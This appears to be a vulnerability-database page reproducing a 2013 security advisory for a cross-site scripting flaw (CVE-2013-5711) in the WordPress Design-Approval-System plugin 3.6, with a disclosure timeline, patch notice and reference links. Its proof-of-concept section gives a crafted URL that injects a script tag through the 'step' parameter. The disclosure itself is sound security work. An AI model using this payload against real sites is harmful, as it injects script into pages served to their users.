Vulners
Lucene search
WordPress Design-Approval-System 3.6 Cross Site Scripting
🗓️ 13 Sep 2013 00:00:00Reported by Alexandro SilvaType 
packetstorm🔗 packetstormsecurity.com👁 32 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2013-5711 | 17 Sep 201301:00 | – | cve |
 | CVE-2013-5711 | 17 Sep 201301:00 | – | cvelist |
 | EUVD-2013-5548 | 7 Oct 202500:30 | – | euvd |
 | CVE-2013-5711 | 17 Sep 201312:04 | – | nvd |
 | WordPress Design Approval System Plugin <= 3.6 - XSS | 9 Sep 201300:00 | – | patchstack |
 | Cross site scripting | 17 Sep 201312:04 | – | prion |
 | CVE-2013-5711 | 22 May 202500:50 | – | redhatcve |
 | [iBliss Security Advisory] Cross-Site Scripting (XSS) vulnerability in Design-approval-system wordpress plugin | 3 Oct 201300:00 | – | securityvulns |
 | Design Approval System 3.6 - XSS | 1 Aug 201410:59 | – | wpvulndb |
`[Design-Approval-System Wordpress plugin XSS ]
[vendor product description]
A system to streamline the process of getting designs, photos,
documents, videos or music approved by clients quickly.
[Bug Description]
The walkthrouth web page does not validate the step parameter leading to
a Cross-site scripting flaw. An no authenticated user is required to
exploit these security flaws.
[History]
Advisory sent to vendor on 09/03/2013
Vendor reply 09/03/2013
Vendor patch published 09/07/2013
[Impact]
HIGH
[Afected Version]
3.6
[Vendor Reply]
03/09/2013
07/09/2013 - Vulnerability fixed. 3.7 version released.
[CVE Reference]
CVE-2013-5711
[PoC]
Payload:
http://[host]/wordpress/wp-content/plugins/design-approval-system/admin/walkthrough/walkthrough.php?step=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
[References]
[1] Design Approval System
http://wordpress.org/plugins/design-approval-system
[2] Design Approval System 3.7 release notes
http://wordpress.org/plugins/design-approval-system/other_notes/
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/
--------------------------------------------
iBliss Segurança e Inteligência - Sponsor: Alexandro Silva - Alexos
alexos (at) ibliss.com (dot) br [email concealed]
[Greetz]
Ewerson Guimarães - Crash
--
Alexandro Silva
[email protected]
iBLISS Segurança & Inteligência
+55 71 8847-5385
+55 11 3255-3926
www.ibliss.com.br
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Sep 2013 00:00Current
6.7Medium risk
Vulners AI Score6.7
EPSS0.00239